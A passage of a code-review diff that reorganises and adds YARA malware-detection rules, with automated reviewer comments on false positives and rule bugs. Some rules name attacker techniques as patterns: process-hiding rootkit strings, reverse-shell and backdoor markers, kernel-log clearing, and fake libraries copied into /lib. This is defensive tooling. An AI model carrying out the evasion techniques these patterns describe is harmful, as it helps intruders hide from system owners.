any of ($f*) and none of ($not*) } rule sys_net_recon_exfil: high { 
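Review bot: In id_rsa_not_ssh, `$not_openssh = "OpenSSH"` and `$not_ssh2 = "SSH2"` are ordinary words that turn up in help text and log messages of tools that merely handle keys (converters, backup scripts, stealers that tag their loot), so a credential harvester that prints "OpenSSH" falls back to the medium rule. The protocol-level markers (`SSH_MSG`, `SSH_USERAUTH`, `SSH-2.0`, `SSH_AUTH_SOCK`) are real evidence of a client implementation; consider exempting only on those and treating the two bare names as insufficient on their own. `ssh_folder`, which this rule depends on, is defined above the hunk.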
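Review bot: `$header = "f0VMRgEBAQ"` is the base64 of `\x7fELF\x01\x01\x01`, i.e. only a 32-bit little-endian ELF, so a 64-bit payload — the common case on x86-64 and aarch64 — is missed outright; its prefix encodes as `f0VMRgIBAQ` (`\x7fELF\x02\x01\x01`), and the 32-bit big-endian form used by MIPS/PowerPC IoT bots is `f0VMRgECAQ`. Add those as `$header64` and `$header_be` and match `any of them`. These literals also assume the ELF starts at a 3-byte-aligned offset of the base64 stream; embedded mid-string the encoding shifts and depends on the preceding bytes, which a plain literal cannot cover, so a comment stating that limitation would stop readers from treating the rule as complete.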
@@ -63,8 +65,9 @@ rule sys_net_recon_exfil: high { description = "may exfiltrate collected system and network information" strings: - $not_curl = "CURLAUTH_ONLY" + $not_curl = "CURLAUTH_ONLY" + $not_cloudinit = "cloudinit" fullword condition: - sys_net_recon and (obfuscate or exfil) and none of ($not*) + sys_net_recon and obfuscate and exfil and none of ($not*) } diff --git a/rules/discover/network/connectivity.yara b/rules/discover/network/connectivity.yara new file mode 100644 index 000000000..5a4feaef5 --- /dev/null +++ b/rules/discover/network/connectivity.yara @@ -0,0 +1,10 @@ +rule network_connectivity: low { + meta: + description = "checks Internet connectivity" + + strings: + $ref = "http://www.msftncsi.com/ncsi.txt" + + condition: + any of them +} diff --git a/rules/discover/network/interface-get.yara b/rules/discover/network/interface.yara similarity index 100% rename from rules/discover/network/interface-get.yara rename to rules/discover/network/interface.yara diff --git a/rules/process/effective-groupid-get.yara b/rules/discover/process/egid.yara similarity index 100% rename from rules/process/effective-groupid-get.yara rename to rules/discover/process/egid.yara diff --git a/rules/process/effective-userid-get.yara b/rules/discover/process/euid.yara similarity index 100% rename from rules/process/effective-userid-get.yara rename to rules/discover/process/euid.yara diff --git a/rules/process/name-get.yara b/rules/discover/process/name.yara similarity index 97% rename from rules/process/name-get.yara rename to rules/discover/process/name.yara index 7238cff81..eb1a72e48 100644 --- a/rules/process/name-get.yara +++ b/rules/discover/process/name.yara @@ -1,4 +1,4 @@ -rule progname: medium { +rule progname: low { meta: description = "get the current process name" ref = "https://linux.die.net/man/3/program_invocation_short_name" 
diff --git a/rules/process/parent_pid-get.yara b/rules/discover/process/parent.yara similarity index 100% rename from rules/process/parent_pid-get.yara rename to rules/discover/process/parent.yara diff --git a/rules/process/pid-get.yara b/rules/discover/process/pid.yara similarity index 100% rename from rules/process/pid-get.yara rename to rules/discover/process/pid.yara diff --git a/rules/process/priority-get.yara b/rules/discover/process/priority.yara similarity index 100% rename from rules/process/priority-get.yara rename to rules/discover/process/priority.yara diff --git a/rules/process/limit-get.yara b/rules/discover/process/resource-limits.yara similarity index 100% rename from rules/process/limit-get.yara rename to rules/discover/process/resource-limits.yara diff --git a/rules/discover/process/runtime_deps.yara b/rules/discover/process/runtime_deps.yara new file mode 100644 index 000000000..5abe0ebdd --- /dev/null +++ b/rules/discover/process/runtime_deps.yara @@ -0,0 +1,27 @@ +rule tls_get_addr: medium { + meta: + description = "looks up thread private variables, may be used for loaded library discovery" + ref = "https://chao-tic.github.io/blog/2018/12/25/tls" + + strings: + $val = "__tls_get_addr" fullword + + condition: + any of them +} + +import "elf" +import "math" + +rule sus_dylib_tls_get_addr: high { + meta: + description = "suspicious runtime dependency resolution" + + strings: + $val = "__tls_get_addr" fullword + $not_trampoline = "__interceptor_trampoline" + $not_glibc_private = "GLIBC_PRIVATE" + + condition: + filesize < 500KB and elf.type == elf.ET_DYN and $val and none of ($not*) and math.entropy(1, filesize) >= 6 +} diff --git a/rules/process/userid-get.yara b/rules/discover/process/uid.yara similarity index 100% rename from rules/process/userid-get.yara rename to rules/discover/process/uid.yara 
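Review bot: sus_dylib_tls_get_addr gates on `elf.type == elf.ET_DYN`, but ET_DYN is also the e_type of every PIE executable, so a small (<500 KB) position-independent program with thread-local storage and the code density stripped machine code commonly reaches (entropy ≥ 6) gets a `high` hit even though the description is about a library. A PT_INTERP segment is present on executables and absent on shared objects, so add `not for any i in (0..elf.number_of_segments): (elf.segments[i].type == elf.PT_INTERP)`. Separately, `__tls_get_addr` is referenced by any dynamically linked program that uses TLS (glibc, libstdc++, Rust std), so `tls_get_addr: medium` on its own will be very common and `low` is closer to its evidentiary weight. Style: the `import "elf"`/`import "math"` lines sit between the two rules; YARA accepts that, but the convention in this tree is imports at the top of the file.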
diff --git a/rules/process/working_directory-get.yara b/rules/discover/process/working_directory.yara similarity index 100% rename from rules/process/working_directory-get.yara rename to rules/discover/process/working_directory.yara diff --git a/rules/discover/system/cpu-info.yara b/rules/discover/system/cpu.yara similarity index 100% rename from rules/discover/system/cpu-info.yara rename to rules/discover/system/cpu.yara diff --git a/rules/discover/system/dev_full.yara b/rules/discover/system/dev_full.yara new file mode 100644 index 000000000..ee88bdd61 --- /dev/null +++ b/rules/discover/system/dev_full.yara @@ -0,0 +1,10 @@ +rule dev_full: low linux { + meta: + description = "tests full disk behavior" + + strings: + $val = "/dev/full" fullword + + condition: + $val +} diff --git a/rules/discover/system/dmesg.yara b/rules/discover/system/dmesg.yara new file mode 100644 index 000000000..50f9f9057 --- /dev/null +++ b/rules/discover/system/dmesg.yara @@ -0,0 +1,10 @@ +rule dmesg { + meta: + description = "accesses the kernel log ring buffer" + + strings: + $dmesg = "dmesg" fullword + + condition: + any of them +} diff --git a/rules/discover/system/hardware-info.yara b/rules/discover/system/hardware.yara similarity index 100% rename from rules/discover/system/hardware-info.yara rename to rules/discover/system/hardware.yara diff --git a/rules/discover/system/hostname-get.yara b/rules/discover/system/hostname.yara similarity index 100% rename from rules/discover/system/hostname-get.yara rename to rules/discover/system/hostname.yara diff --git a/rules/discover/system/hostinfo_collector.yara b/rules/discover/system/multiple.yara similarity index 100% rename from rules/discover/system/hostinfo_collector.yara rename to rules/discover/system/multiple.yara diff --git a/rules/discover/system/proc.yara b/rules/discover/system/proc.yara new file mode 100644 index 000000000..b9c2e8ecf --- /dev/null +++ b/rules/discover/system/proc.yara 
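Review bot: `rule dmesg` carries no severity tag, unlike `dev_full: low linux` beside it and the rest of the rules in this change; the updated scan_archive test data records it as `low`, so it is relying on the default. Make it explicit as `rule dmesg: low` so a later change to the default does not silently reclassify it.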
@@ -0,0 +1,20 @@ +rule proc_multiple: high { + meta: + description = "accesses an unusual assortment of /proc files" + + strings: + $ref = /\/proc\/[%{$][\/\$\w\}]{0,12}/ + $stat = "/proc/stat" + $net_den = "/proc/net/dev" + $proc_exe = "/proc/%d/exe" + $proc_kernel_v = "/proc/sys/kernel/version" + $proc_kernel_osrelease = "/proc/sys/kernel/osrelease" + $proc_self_maps = "/proc/self/maps" + $proc_ngroups_max = "/proc/sys/kernel/ngroups_max" + $proc_rtsig_max = "/proc/sys/kernel/rtsig-max" + $proc_meminfo = "/proc/meminfo" + $proc_cpuinfo = "/proc/cpuinfo" + + condition: + filesize < 2MB and int32(0) == 1179403647 and 80 % of them +} diff --git a/rules/evasion/file/attr/chflags.yara b/rules/evasion/file/attr/chflags.yara new file mode 100644 index 000000000..41fcea50d --- /dev/null +++ b/rules/evasion/file/attr/chflags.yara @@ -0,0 +1,11 @@ +rule chflags_hidden: high { + meta: + description = "hides files using chflags" + ref = "https://man.freebsd.org/cgi/man.cgi?chflags(1)" + + strings: + $chflags = /chflags.{0,3} hidden [\w\.\/]{0,24}/ + + condition: + any of them +} diff --git a/rules/evasion/covert-location/chdir-unusual.yara b/rules/evasion/file/location/chdir-unusual.yara similarity index 94% rename from rules/evasion/covert-location/chdir-unusual.yara rename to rules/evasion/file/location/chdir-unusual.yara index 5df099283..ffacd7992 100644 --- a/rules/evasion/covert-location/chdir-unusual.yara +++ b/rules/evasion/file/location/chdir-unusual.yara @@ -76,8 +76,10 @@ rule cd_var_subdir: high { $d_var_run = "cd /var/run" $d_var_tmp = "cd /var/tmp" + $not_var_log_packages = "cd /var/log/packages" + condition: - any of ($d*) + any of ($d*) and none of ($not*) } rule cd_val_obsessive: critical { @@ -104,7 +106,7 @@ rule unusual_cd_dev: high { hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" strings: - $d_dev = /cd \/dev[\w\/\.]{0,64}/ + $d_dev = /cd \/dev\/[\w\/\.]{1,64}/ $makedev = "MAKEDEV" condition: 
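Review bot: Several of the strings proc_multiple counts toward `80 % of them` are embedded by glibc rather than by the program's author — as far as I recall `/proc/sys/kernel/ngroups_max`, `/proc/sys/kernel/rtsig-max`, `/proc/meminfo` and `/proc/stat` come from sysconf()/get_nprocs and `/proc/self/maps` from pthread_getattr_np — so any statically linked glibc binary arrives with most of the quota already met, and this is a `high`. If static malware is the target, either drop the libc-sourced strings or require the author-signalled ones (`$proc_exe`, `$net_den`, `$ref`) explicitly alongside the percentage. `int32(0) == 1179403647` also reads as a different check from the `uint32(0)` used everywhere else; it is equivalent for this value but should be `uint32(0)` for consistency.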
diff --git a/rules/evasion/covert-location/dev-mqueue.yara b/rules/evasion/file/location/dev-mqueue.yara similarity index 100% rename from rules/evasion/covert-location/dev-mqueue.yara rename to rules/evasion/file/location/dev-mqueue.yara diff --git a/rules/evasion/covert-location/dev-shm.yara b/rules/evasion/file/location/dev-shm.yara similarity index 100% rename from rules/evasion/covert-location/dev-shm.yara rename to rules/evasion/file/location/dev-shm.yara diff --git a/rules/evasion/file/location/lib.yara b/rules/evasion/file/location/lib.yara new file mode 100644 index 000000000..9882dba36 --- /dev/null +++ b/rules/evasion/file/location/lib.yara @@ -0,0 +1,35 @@ +rule libsec: medium linux { + meta: + description = "may pretend to be a fake library" + + strings: + $sec = /\/lib\/libsec[\w\.]{0,16}/ fullword + $dsx = /\/lib\/libdsx[\w\.]{0,16}/ fullword + + condition: + any of them +} + +rule libsec_subdir: high linux { + meta: + description = "fake security library directory" + + strings: + $ref = /\/lib\/libsec[\w\.]{0,16}\/[\.\w\-\%\@]{0,16}/ fullword + + condition: + any of them +} + +rule install_to_lib: high linux { + meta: + description = "may transfer fake libraries into /lib" + + strings: + $cp_p = /cp -p [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + $cp = /cp [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + $mv = /mv [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + + condition: + any of them +} diff --git a/rules/evasion/file/location/multiple.yara b/rules/evasion/file/location/multiple.yara new file mode 100644 index 000000000..7039993b6 --- /dev/null +++ b/rules/evasion/file/location/multiple.yara 
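Review bot: `$sec = /\/lib\/libsec[\w\.]{0,16}/ fullword` also matches `/lib/libsecret-1.so.0`, the GNOME keyring client library, because the character class has no `-` and a following `-` satisfies the fullword boundary, so anything referring to libsecret by an absolute `/lib/` path collects this `medium`. Add `$not_libsecret = "/lib/libsecret"` and gate with `none of ($not*)`. A `description` naming the family these `libsec`/`libdsx` names come from would also help a reader judge the `high` in libsec_subdir, which currently only says "fake security library directory".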
@@ -0,0 +1,19 @@
+rule multiple_elf: high linux {
+ meta:
+ description = "references multiple system paths, may be trying to hide content"
+
+ strings:
+ $ = /\/dev\/shm\/[\%\w\-\/\.]{0,64}/
+ $ = /\/dev\/mqueue\/[\%\w\-\/\.]{0,64}/
+ $ = /\/var\/tmp\/[\%\w\-\/\.]{0,64}/
+ $ = /\/tmp\/[\%\w\-\/\.]{0,64}/ fullword
+ $ = /\/bin\/[\%\w\-\/\.]{0,64}/ fullword
+ $ = /\/usr\/bin\/[\%\w\-\/\.]{0,64}/
+ $ = /\/etc\/cron\.d[\%\w\-\/\.]{0,64}/
+ $ = /\/etc\/crontab/
+ $ = /\/var\/log\/[\%\w\-\/\.]{0,64}/
+ $ = /\/var\/spool\/[\%\w\-\/\.]{0,64}/
+
+ condition:
+ filesize < 1MB and uint32(0) == 1179403647 and 80 % of them
+}
diff --git a/rules/evasion/hidden_paths/odd_pidfile.yara b/rules/evasion/file/location/pidfile.yara
similarity index 100%
rename from rules/evasion/hidden_paths/odd_pidfile.yara
rename to rules/evasion/file/location/pidfile.yara
diff --git a/rules/evasion/hide_artifacts/system_directories.yara b/rules/evasion/file/location/system_directory.yara
similarity index 63%
rename from rules/evasion/hide_artifacts/system_directories.yara
rename to rules/evasion/file/location/system_directory.yara
index f70414ddd..9f2bd2899 100644
--- a/rules/evasion/hide_artifacts/system_directories.yara
+++ b/rules/evasion/file/location/system_directory.yara
@@ -1,3 +1,15 @@
+rule cp_to_apple_directory: high {
+ meta:
+ ref = "https://triangletoot.party/@philofishal@infosec.exchange/111211016916902934"
+
+ strings:
+ $cp_to_apple_subdir = /cp [\w\.\"\/ ]{1,128} [\w\. \"\/]{1,64}\/Application Support\/Apple[\.\w\"]{0,32}/
+ $cp_to_com_apple = /cp [\w\.\"\/ ]{1,128} [\w\. \"\/]{1,64}\/com.apple[\.\w\"]{0,32}/
+
+ condition:
+ any of them
+}
+
 rule system_fs_manipulator: medium {
 meta:
 description = "Modifies files within system directories"
diff --git a/rules/evasion/covert-location/var-root.yara b/rules/evasion/file/location/var-root.yara
similarity index 100%
rename from rules/evasion/covert-location/var-root.yara
rename to rules/evasion/file/location/var-root.yara
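Review bot: The description of multiple_elf claims the file `may be trying to hide content`, but its strings only count how many common system paths an ELF references, and 8 of these 10 (`/tmp/`, `/bin/`, `/usr/bin/`, `/var/log/`, `/etc/crontab`, ...) are plausibly present together in ordinary service-management binaries, so a `high` hit will be hard to triage from the text alone. Describe what is measured instead, e.g. `description = "references many temp, cron, log and spool paths (possible staging locations)"`, and consider a `$not_` exclusion if the corpus shows benign hits.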
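Review bot: cp_to_apple_directory is moved in without a `description` meta, although every other rule in this change carries one and the report text comes from it; add `description = "copies files into an Apple-named directory (Application Support/Apple, com.apple)"` under `meta:` above the existing `ref`.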
diff --git a/rules/evasion/hidden_paths/var-run.yara b/rules/evasion/file/location/var-run.yara
similarity index 100%
rename from rules/evasion/hidden_paths/var-run.yara
rename to rules/evasion/file/location/var-run.yara
diff --git a/rules/evasion/hidden_paths/var-tmp.yara b/rules/evasion/file/location/var-tmp.yara
similarity index 100%
rename from rules/evasion/hidden_paths/var-tmp.yara
rename to rules/evasion/file/location/var-tmp.yara
diff --git a/rules/evasion/hidden_paths/x11.yara b/rules/evasion/file/location/x11-unix.yara
similarity index 78%
rename from rules/evasion/hidden_paths/x11.yara
rename to rules/evasion/file/location/x11-unix.yara
index 5ecf54dc8..9145dc33a 100644
--- a/rules/evasion/hidden_paths/x11.yara
+++ b/rules/evasion/file/location/x11-unix.yara
@@ -1,6 +1,6 @@
 rule hidden_x11: high {
 meta:
- description = "may store content in /tmp/.X11-unix"
+ description = "references content in /tmp/.X11-unix"
 ref = "https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/"
 strings:
@@ -18,8 +18,9 @@ rule X11: override {
 $usr_share = "/usr/share/X11"
 $X11Gray = "X11Gray"
 $X11_space = "/etc/X11/"
- $X11R6 = "X11R6"
+ $X11R6 = "X11R6/share"
 $XForwarding = "X11 forwarding"
+ $X = "/tmp/.X11-unix/X" fullword
 condition:
 filesize < 10MB and any of them
diff --git a/rules/evasion/alt_location/rename_system_binary.yara b/rules/evasion/file/name/rename_system_binary.yara
similarity index 100%
rename from rules/evasion/alt_location/rename_system_binary.yara
rename to rules/evasion/file/name/rename_system_binary.yara
diff --git a/rules/evasion/hidden_paths/dev_shm.yara b/rules/evasion/file/prefix/dev.yara
similarity index 76%
rename from rules/evasion/hidden_paths/dev_shm.yara
rename to rules/evasion/file/prefix/dev.yara
index 85ad99723..e34995047 100644
--- a/rules/evasion/hidden_paths/dev_shm.yara
+++ b/rules/evasion/file/prefix/dev.yara
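Review bot: The new override string `$X = "/tmp/.X11-unix/X" fullword` will not match the socket names it appears to target: `fullword` rejects a match followed by an alphanumeric, so `/tmp/.X11-unix/X0` or `/tmp/.X11-unix/X1` do not qualify, only `/tmp/.X11-unix/X` followed by a non-word character such as `%d`. If the intent is display sockets, `$X = /\/tmp\/\.X11-unix\/X\d{1,3}/` is the explicit form. The X11 rule's header is outside this hunk.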
@@ -12,3 +12,14 @@ rule dev_shm_hidden: critical linux {
 condition:
 $dev_shm and not $ignore_mkstemp
 }
+
+rule dev_mqueue_hidden: high {
+ meta:
+ description = "path reference within /dev/mqueue (world writeable)"
+
+ strings:
+ $mqueue = /\/dev\/mqueue\/\.[%\w\.\-\/]{0,64}/
+
+ condition:
+ any of them
+}
diff --git a/rules/evasion/file/prefix/lib.yara b/rules/evasion/file/prefix/lib.yara
new file mode 100644
index 000000000..ebcb8ef4b
--- /dev/null
+++ b/rules/evasion/file/prefix/lib.yara
@@ -0,0 +1,26 @@
+rule lib_subdir: high linux {
+ meta:
+ description = "hides paths within a /lib subdirectory"
+
+ strings:
+ $ref = /\/lib\/[\w\.]{1,16}\/\.[\w\-\%\@]{1,16}/ fullword
+
+ condition:
+ any of them
+}
+
+rule hidden_library: high {
+ meta:
+ description = "hidden path in a Library directory"
+ hash_2018_Calisto = "81c127c3cceaf44df10bb3ceb20ce1774f6a9ead0db4bd991abf39db828661cc"
+ hash_2022_CloudMensis_WindowServer = "317ce26cae14dc9a5e4d4667f00fee771b4543e91c944580bbb136e7fe339427"
+ hash_2020_MacOS_TinkaOTP = "90fbc26c65e4aa285a3f7ee6ff8a3a4318a8961ebca71d47f51ef0b4b7829fd0"
+
+ strings:
+ $hidden_library = /\/Library\/\.\w{1,128}/
+ $not_dotdot = "/Library/../"
+ $not_private = "/System/Library/PrivateFrameworks/"
+
+ condition:
+ $hidden_library and none of ($not*)
+}
diff --git a/rules/evasion/hidden_paths/hidden.yara b/rules/evasion/file/prefix/prefix.yara
similarity index 72%
rename from rules/evasion/hidden_paths/hidden.yara
rename to rules/evasion/file/prefix/prefix.yara
index 3601902d3..a2b1df3e3 100644
--- a/rules/evasion/hidden_paths/hidden.yara
+++ b/rules/evasion/file/prefix/prefix.yara
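Review bot: dev_mqueue_hidden is added without the `linux` tag that its sibling `dev_shm_hidden: critical linux` in the same file carries, so the two /dev rules will be filtered differently by platform. `rule dev_mqueue_hidden: high linux {` keeps them consistent; the description's `world writeable` is also the spelling `world-writable`.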
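Review bot: lib_subdir's `[\w\.]{1,16}` segment accepts `..`, so `/lib/../.config`-style relative paths match and escalate to high, the same case that hidden_library in this file guards with `$not_dotdot = "/Library/../"`. Add `$not_dotdot = "/lib/../"` to its strings and change the condition to `$ref and none of ($not*)`.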
@@ -42,11 +42,13 @@ rule hidden_short_path: high {
 description = "hidden short path in a system directory"
 strings:
- $crit = /[\w\/\.]{0,32}\/(tmp|usr\/\w{0,8}|bin|lib|LaunchAgents|lib64|var|etc|shm|mqueue|spool|log|Users|Movies|Music|WebServer|Applications|Shared|Library|System)\/\.\w[\w\-\.]{0,2}/ fullword
+ $crit = /[\w\/\.]{0,32}\/(usr\/\w{0,8}|bin|lib|LaunchAgents|lib64|var|etc|shm|mqueue|spool|log|Users|Movies|Music|WebServer|Applications|Shared|Library|System)\/\.\w[\w\-\.]{0,2}/ fullword
 $not_network_manager = "org.freedesktop.NetworkManager"
 $not_private = "/System/Library/PrivateFrameworks/"
 $not_X11 = "/tmp/.X11-unix"
+ $not_XIM = "/tmp/.XIM-unix"
 $not_cpp = "/tmp/.cpp.err"
+ $not_pwd = "/etc/.pwd.lock"
 condition:
 $crit and none of ($not*)
@@ -73,19 +75,3 @@ rule hidden_danger_path: critical {
 condition:
 $ref
 }
-
-rule hidden_library: high {
- meta:
- description = "hidden path in a Library directory"
- hash_2018_Calisto = "81c127c3cceaf44df10bb3ceb20ce1774f6a9ead0db4bd991abf39db828661cc"
- hash_2022_CloudMensis_WindowServer = "317ce26cae14dc9a5e4d4667f00fee771b4543e91c944580bbb136e7fe339427"
- hash_2020_MacOS_TinkaOTP = "90fbc26c65e4aa285a3f7ee6ff8a3a4318a8961ebca71d47f51ef0b4b7829fd0"
-
- strings:
- $hidden_library = /\/Library\/\.\w{1,128}/
- $not_dotdot = "/Library/../"
- $not_private = "/System/Library/PrivateFrameworks/"
-
- condition:
- $hidden_library and none of ($not*)
-}
diff --git a/rules/evasion/hidden_paths/proc.yara b/rules/evasion/file/prefix/proc.yara
similarity index 100%
rename from rules/evasion/hidden_paths/proc.yara
rename to rules/evasion/file/prefix/proc.yara
diff --git a/rules/evasion/file/prefix/tmp.yara b/rules/evasion/file/prefix/tmp.yara
new file mode 100644
index 000000000..ef978adeb
--- /dev/null
+++ b/rules/evasion/file/prefix/tmp.yara
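Review bot: With `tmp` removed from the `$crit` alternation, the `$not_X11`, `$not_XIM` and `$not_cpp` exclusions no longer correspond to anything `$crit` can match here, yet `none of ($not*)` still lets any file that merely mentions `/tmp/.X11-unix` suppress a hit on an unrelated `/etc/.x` or `/var/.x` path. Since tmp.yara in this change already carries those three strings, drop them from this rule and keep only `$not_network_manager`, `$not_private` and the new `$not_pwd`. The rule's header line is outside this hunk.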
@@ -0,0 +1,17 @@
+rule hidden_short_path: high {
+ meta:
+ description = "hidden short path in a temp directory"
+
+ strings:
+ $crit = /[\w\/\.]{0,32}\/tmp\/\.\w[\w\-\.]{0,2}/ fullword
+ $not_network_manager = "org.freedesktop.NetworkManager"
+ $not_private = "/System/Library/PrivateFrameworks/"
+ $not_X11 = "/tmp/.X11-unix"
+ $not_XIM = "/tmp/.XIM-unix"
+ $not_cpp = "/tmp/.cpp.err"
+ $not_ice = "SESSION_MANAGER" fullword
+ $not_md = "/dev/.tmp.md.%d:%d:%d"
+
+ condition:
+ $crit and none of ($not*)
+}
diff --git a/rules/evasion/hidden_paths/dev_mqueue.yara b/rules/evasion/hidden_paths/dev_mqueue.yara
deleted file mode 100644
index 584e9587f..000000000
--- a/rules/evasion/hidden_paths/dev_mqueue.yara
+++ /dev/null
@@ -1,10 +0,0 @@
-rule dev_mqueue_hidden: high {
- meta:
- description = "path reference within /dev/mqueue (world writeable)"
-
- strings:
- $mqueue = /\/dev\/mqueue\/\.[%\w\.\-\/]{0,64}/
-
- condition:
- any of them
-}
diff --git a/rules/evasion/hide_artifacts/system_directory.yara b/rules/evasion/hide_artifacts/system_directory.yara
deleted file mode 100644
index f6e2c454a..000000000
--- a/rules/evasion/hide_artifacts/system_directory.yara
+++ /dev/null
@@ -1,11 +0,0 @@
-rule cp_to_apple_directory: high {
- meta:
- ref = "https://triangletoot.party/@philofishal@infosec.exchange/111211016916902934"
-
- strings:
- $cp_to_apple_subdir = /cp [\w\.\"\/ ]{1,128} [\w\. \"\/]{1,64}\/Application Support\/Apple[\.\w\"]{0,32}/
- $cp_to_com_apple = /cp [\w\.\"\/ ]{1,128} [\w\. \"\/]{1,64}\/com.apple[\.\w\"]{0,32}/
-
- condition:
- any of them
-}
diff --git a/rules/evasion/hijack_execution/etc-ld.so.preload.yara b/rules/evasion/hijack_execution/etc-ld.so.preload.yara
index edb763205..5e3375b92 100644
--- a/rules/evasion/hijack_execution/etc-ld.so.preload.yara
+++ b/rules/evasion/hijack_execution/etc-ld.so.preload.yara
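Review bot: tmp.yara declares `rule hidden_short_path: high`, the same identifier as the rule that stays in prefix.yara in this change. YARA rejects duplicate rule identifiers within one compiled namespace, and even if each file is compiled into its own namespace the name is what override metas and reports key on, so two rules sharing it are ambiguous. Rename this one, e.g. `rule hidden_short_tmp_path: high {`.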
@@ -25,6 +25,7 @@ rule etc_ld_preload_not_ld: high linux {
 $not_env_hwcap = "LD_HWCAP_MASK"
 $not_env_audit = "LD_AUDIT"
 $not_cache = "ld.so.cache"
+ $not_man = "MAN_DISABLE_SECCOMP"
 condition:
 $ref and none of ($not*)
diff --git a/rules/evasion/hijack_execution/process-hide.yara b/rules/evasion/hijack_execution/process-hide.yara
deleted file mode 100644
index df35218e1..000000000
--- a/rules/evasion/hijack_execution/process-hide.yara
+++ /dev/null
@@ -1,65 +0,0 @@
-rule elf_processhide: high {
- meta:
- description = "userland rootkit designed to hide processes"
- hash_2023_Unix_Coinminer_Xanthe_0e6d = "0e6d37099dd89c7eed44063420bd05a2d7b0865a0f690e12457fbec68f9b67a8"
- hash_2023_Unix_Malware_Agent_7337 = "73376cbb9666d7a9528b9397d4341d0817540448f62b22b51de8f6a3fb537a3d"
- hash_2023_Unix_Trojan_Prochider_234c = "234c0dd014a958cf5958a9be058140e29f46fca99eb26f5755f5ae935af92787"
-
- strings:
- $prochide = "processhide"
- $process_to_filter = "process_to_filter"
-
- condition:
- all of them
-}
-
-rule linux_process_hider: critical linux {
- meta:
- description = "userland rootkit designed to hide processes"
- ref = "prochid.c"
- hash_2023_OK_c38c = "c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a"
- hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
- hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
-
- strings:
- $f_proc_self_fd = "/proc/self/fd/%d"
- $f_proc_stat = "/proc/%s/stat"
- $f_readdir = "readdir"
- $f_dlsym = "dlsym"
- $f_readlink = "readlink"
- $x_hide_process = "hide_proc" fullword
- $x_proc_hide = "proc_hide" fullword
- $x_process_hide = "process_hide" fullword
- $x_process_hiding = "process_hiding" fullword
- $x_hidden_proc = "hidden_proc" fullword
- $x_prochide = "processhide"
- $x_process_to_filter = "process_to_filter"
- $x_old_readdir = "old_readdir"
- $x_orig_readdir = "orig_readdir"
- $x_original_readdir = "original_readdir"
- $x_readdirOriginal = "readdirOriginal"
- $x_backdoor = "backdoor" fullword
- $x_is_hidden = "is_hidden" fullword
- $x_hidden_gid = "HIDDEN_GID" fullword
- $x_revshell = "revshell" fullword
- $x_cmdline = "/proc/self/cmdline"
- $not_bpf = "/sys/fs/bpf"
-
- condition:
- filesize < 250KB and all of ($f*) and any of ($x*) and none of ($not*)
-}
-
-rule process_hider: high {
- meta:
- description = "possible userland rootkit designed to hide processes"
-
- strings:
-
$hide_process = "hide_proc" fullword
- $proc_hide = "proc_hide" fullword
- $process_hide = "process_hide" fullword
- $process_hiding = "process_hiding" fullword
- $hidden_proc = "hidden_proc" fullword
-
- condition:
- filesize < 250KB and any of them
-}
diff --git a/rules/evasion/indicator_blocking/hidden_window.yara b/rules/evasion/indicator_blocking/hidden_window.yara
new file mode 100644
index 000000000..35d40bb12
--- /dev/null
+++ b/rules/evasion/indicator_blocking/hidden_window.yara
@@ -0,0 +1,54 @@
+rule subprocess_CREATE_NO_WINDOW: medium {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $sub = "subprocess"
+ $no_window = "CREATE_NO_WINDOW"
+
+ condition:
+ filesize < 32KB and all of them
+}
+
+private rule pythonSetup {
+ strings:
+ $if_distutils = /from distutils.core import .{0,32}setup/
+ $if_setuptools = /from setuptools import .{0,32}setup/
+ $i_setuptools = "import setuptools"
+ $setup = "setup("
+
+ $not_setup_example = ">>> setup("
+ $not_setup_todict = "setup(**config.todict()"
+ $not_import_quoted = "\"from setuptools import setup"
+ $not_setup_quoted = "\"setup(name="
+ $not_distutils = "from distutils.errors import"
+
+ condition:
+ filesize < 128KB and $setup and any of ($i*) in (0..1024) and none of ($not*)
+}
+
+rule subprocess_CREATE_NO_WINDOW_setuptools: high {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $sub = "subprocess"
+ $no_window = "CREATE_NO_WINDOW"
+
+ condition:
+ filesize < 32KB and pythonSetup and all of them
+}
+
+rule subprocess_CREATE_NO_WINDOW_high: high {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $s_sub = "subprocess"
+ $s_no_window = "CREATE_NO_WINDOW"
+
+ $o_discord = "discordapp.com"
+
+ condition:
+ filesize < 32KB and all of ($s*) and any of ($o*)
+}
diff --git a/rules/evasion/logging/dev_log.yara b/rules/evasion/logging/dev_log.yara
new file mode 100644
index 000000000..db2901e44
--- /dev/null
+++ b/rules/evasion/logging/dev_log.yara
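Review bot: The three public rules in hidden_window.yara all carry the identical `description = "runs commands, hides windows"`, so a report cannot tell a bare CREATE_NO_WINDOW hit from the setuptools-context or Discord-context ones that justify the `high` level. Suggest `description = "runs hidden commands from a Python package setup script"` for subprocess_CREATE_NO_WINDOW_setuptools and `description = "runs hidden commands and references Discord"` for subprocess_CREATE_NO_WINDOW_high. In pythonSetup the `$i*` wildcard also matches `$if_distutils` and `$if_setuptools`; if that is intended, a one-line comment saying so would save the next reader a check.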
@@ -0,0 +1,10 @@
+rule full: medium linux {
+ meta:
+ description = "device where local syslog messages are read"
+
+ strings:
+ $val = "/dev/log" fullword
+
+ condition:
+ $val
+}
diff --git a/rules/evasion/logging/dmesg.yara b/rules/evasion/logging/dmesg.yara
new file mode 100644
index 000000000..2d5e6f5e5
--- /dev/null
+++ b/rules/evasion/logging/dmesg.yara
@@ -0,0 +1,13 @@
+rule dmesg_clear: critical linux {
+ meta:
+ description = "clears the kernel log ring buffer"
+
+ strings:
+ $ = "dmesg -C" fullword
+ $ = "dmesg -c" fullword
+ $ = "dmesg --clear" fullword
+ $ = "dmesg --read-clear" fullword
+
+ condition:
+ filesize < 150MB and any of them
+}
diff --git a/rules/evasion/logging/hide_shell_history.yara b/rules/evasion/logging/hide_shell_history.yara
